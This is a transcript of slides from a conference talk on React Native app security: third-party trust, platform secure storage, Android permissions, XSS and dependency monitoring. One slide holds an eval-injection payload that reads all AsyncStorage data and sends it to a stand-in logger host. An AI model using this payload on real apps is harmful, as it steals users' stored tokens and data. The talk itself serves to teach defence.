Upgrade to Pro — share decks privately, control downloads, hide ads and more …

React Native Security

React Native Security

Dee939e8aa52d13793b2f0c5e463777b?s=128

Julia Potapenko

December 05, 2020
Tweet

Transcript

  1. React Native Security Addressing Typical Mistakes JULIA POTAPENKO

  2. About me Security Software Engineer at Cossack Labs We help

    companies to protect their sensitive and valuable data. @julepka
  3. We will talk about Architecture Platforms usage Dependencies

  4. “Choosing React Native and its components means that you understand

    and accept potential security consequences.”
  5. Architecture basics React Native is a cross-platform solution from Facebook

    that allows writing native apps using React (JavaScript or TypeScript).
  6. Trusting third parties Apple and Google are must haves. Add

    Facebook to the list.
  7. Trusting third parties Apple and Google are must haves. Add

    Facebook to the list.
  8. Trusting third parties Apple and Google are must haves. Add

    Facebook to the list. CVE-2020-1911 CVE-2020-1912 CVE-2020-1913
  9. “Working with React Native developers deal with security for all

    three platforms: iOS, Android and React Native.”
  10. OWASP Mobile Top 10 #1 Improper platform usage

  11. React Native is a leaky abstraction @vixentael

  12. Secure Store Example iOS Android Keychain SharedPreferences + KeyStore Data

    stored encrypted Yes Yes
  13. Secure Store Example iOS Android Keychain SharedPreferences + KeyStore Data

    stored encrypted Yes Yes Data persists across app reinstalls Yes No Hardware-backed encryption Yes Depends on device vendor Data decrypted only before usage Decrypted when device unlocked Yes
  14. Managing Android Permissions Android: You can add permissions in multiple

    files
  15. Managing Android Permissions Android: You can add permissions in multiple

    files + React Navite: It is common practice to use third-party solutions
  16. Managing Android Permissions Android: You can add permissions in multiple

    files + React Navite: It is common practice to use third-party solutions =
  17. Managing Android Permissions Android: You can add permissions in multiple

    files + React Native: It is common practice to use third-party solutions = I don’t need this permission The app crashes if I delete it
  18. Is XSS possible? XSS possibility is decreases by design.

  19. Is XSS possible? XSS possibility is decreases by design. XSS

    is still possible. eval() _reactNative.AsyncStorage.getAllKeys(function(err,result) {_reactNative.AsyncStorage.multiGet(result,function(err,result) {fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});}); Steal all the data from local storage (AsyncStorage) by exploiting eval-based injection and accessing React Native APIs
  20. Apart from Source Code Annual BIS Reports US encryption export

    regulations Apple privacy rules User acknowledgement about private data usage
  21. “50 shades of dependencies”

  22. A typical day for React Native app developer

  23. A typical day for React Native app developer (It is

    joke )
  24. Monitoring dependencies

  25. Monitoring dependencies So many dependencies Additional CI work Integrating dependency

    checkers
  26. Monitoring dependencies So many dependencies Additional CI work One update

    triggers another update Integrating dependency checkers Updates may be incompatible What if there is no fix for vulnerability?
  27. ✅ Learn more about the issue, its scope ✅ Document

    it, make the team aware ✅ Monitor it and book the time for the update What if there is no fix?
  28. ✅ Learn more about the issue, its scope ✅ Document

    it, make the team aware ✅ Monitor it and book the time for the update What if there is no fix? React Native requires team to plan time more carefully
  29. React Native requires team to plan time more carefully ➡

    iOS or Android update ➡ React Native update ➡ Forked version update ➡ Dependencies update ➡ Mobile app source code update
  30. Final Thoughts “Learn once, write anywhere.” “Learn once, ask mobile

    security people for help.”
  31. Where to go next My React Native Security Article https://www.cossacklabs.com/blog/react-native-app-security.html

    React Native Security Guide https://reactnative.dev/docs/security
  32. Thank You! @julepka